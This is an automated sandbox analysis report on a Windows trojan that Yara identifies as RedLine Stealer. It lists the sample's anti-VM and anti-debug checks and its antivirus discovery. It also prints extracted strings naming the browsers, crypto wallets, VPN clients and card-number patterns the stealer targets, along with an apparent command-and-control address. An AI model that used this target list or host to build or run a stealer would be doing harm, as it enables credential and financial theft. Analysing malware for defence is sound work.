Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Window / User API: threadDelayed 2750			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Window / User API: threadDelayed 5689			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe TID: 6964

Thread sleep time: -11990383647911201s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware_KWC4Y56Win32_VideoControllerAXZNRU94VideoController120060621000000.000000-00026994397display.infMSBDAUCR_NBGZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP7N5LX5Al
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	Binary or memory string: VMWare
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269777182.00000000007D3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_0040CE09

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

1_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

1_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Code function: 1_2_0040ADB0 GetProcessHeap,HeapFree,

1_2_0040ADB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0040CE09
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0040E61C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00416F6A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_004123F1 SetUnhandledExceptionFilter,	1_2_004123F1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Memory allocated: page read and write | page guard

Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Code function: GetLocaleInfoA,

1_2_00417A20

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Code function: 1_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_00412A15

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472, type: MEMORY
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: Electrum
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: ssnMaestro Cardcookies.sqlite\Program Files (x86)\configJCB Card Safari/537.36\Google\Chrome\User DataKoreanLocalCardemail3[47][0-9]{13}$GuardaArmoryLocalAppDatadisplayNamehost_key^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$\user.configNameatomictdata\K-Meleon\Torch\User Data\CatalinaGroup\Citrio\User Data^3(?:0[0-5]\|[68][0-9])[0-9]{11}$\NVIDIA Corporation\NVIDIA GeForce ExperienceexpireDatelastNameexpires_utc//setting[@name='Username']/valueusertagttp://checkip.amazonaws.com/Mozilla/5.0 (^(6541\|6556)[0-9]{12}$logins.jsonovpn\BraveSoftware\Brave-Browser\User Data\Program Data\Laser CardexpirationDate\Epic Privacy Browser\User DataExodus\Opera Software\DisplayVersion%localappdata%\settingsprotocol^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$\Elements Browser\User Data%DSK_23%cmdOpera GX4[0-9]{12}(?:[0-9]{3})?$cookiesAccountInfo.txtaddress\Chedot\User Datacom.liberty.jaxx\Comodo\IceDragon^3[47][0-9]{13}$dob\Sputnik\Sputnik\User Datakey4.dbWeb DataSELECT ExecutablePath, ProcessID FROM Win32_ProcessAtomicWin32_OperatingSystemDiners Club Card\Kometa\User DataSteamPathkey3.db\MapleStudio\ChromePlus\User Datawaasflleasft.datasf; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/CommandLineProtonVPN.exe\Telegram Desktop\tdataSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CocCoc\Browser\User Data\Orbitum\User Data\Uran\User Datapassword-checkProcessID\7Star\7Star\User Data\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewerCookies\Iridium\User DataAmex Cardis_secureSoftware\Valve\SteamLogin DataID: isSecureVisa Card5[1-5][0-9]{14}$\Google(x86)\Chrome\User Data{0}\.purple\accounts.xmlDiscover Cardwaasflletasf\Chromium\User DataNordVPNv11^9[0-9]{15}$Coinomi) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$\NETGATE Technologies\BlackHaw\uCozMedia\Uran\User DataInsta Payment Card^63[7-9][0-9]{13}$\Program Files\pin//setting[@name='Password']/valueOpera GX Stable\liebao\User DataSELECT * FROM Win32_Process Where SessionId='\Comodo\Dragon\User Data\360Browser\Browser\User DatafirstName\Coowon\Coowon\User Datassfnname\Mozilla\Firefoxphone_number\Mail.Ru\Atom\User DataEthereum\wallets^(62[0-9]{14,17})$.vdfcard_number_encrypted, Name: Union Pay CardCarte Blanche CardAppData\Roaming\Version\Chromodo\User Datacredit_cards^389[0-9]{11}$^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$hostpasswordUsername_valuemoz_cookiesUser Datawindows-1251, CommandLine: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\Nichrome\User DataWindows NTkey_dataDisplayNamex64Solo Card.walletorigin_urlpassword_valueVisa Master Cardlast_nameNordVpn.exeexpirySwitch CardJaxxpath\CentBrowser\User Data\Vivaldi\User Datax
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: l3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: l/C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: Ethereum
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472, type: MEMORY
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472, type: MEMORY
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a3176.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.5020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.75cdf0.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Path Interception	Masquerading1	OS Credential Dumping1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion23	Input Capture1	Security Software Discovery261	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion23	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery12	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery134	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	75%	Virustotal		Browse
SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	32%	Metadefender		Browse
SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	76%	ReversingLabs	Win32.Trojan.Masslogger
SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	100%	Avira	HEUR/AGEN.1139343
SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139343		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://service.r	0%	URL Reputation	safe
http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange	0%	Avira URL Cloud	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
https://api.ip.sb/geoip	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
http://tempuri.org/IRemotePanel/GetTasksResponse	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/SendClientInfo	0%	Avira URL Cloud	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	0%	URL Reputation	safe
http://ns.adobe.c/go	0%	Avira URL Cloud	safe
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://ns.adobe.cobjo	0%	Avira URL Cloud	safe
http://support.a	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://support.a	0%	URL Reputation	safe
http://tempuri.org/IRemotePanel/GetSettingsResponse	0%	Avira URL Cloud	safe
http://45.14.13.58:3214	0%	Avira URL Cloud	safe
http://api.ip.sb	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/SendClientInfoResponse	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetTasks	0%	Avira URL Cloud	safe
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	0%	Avira URL Cloud	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
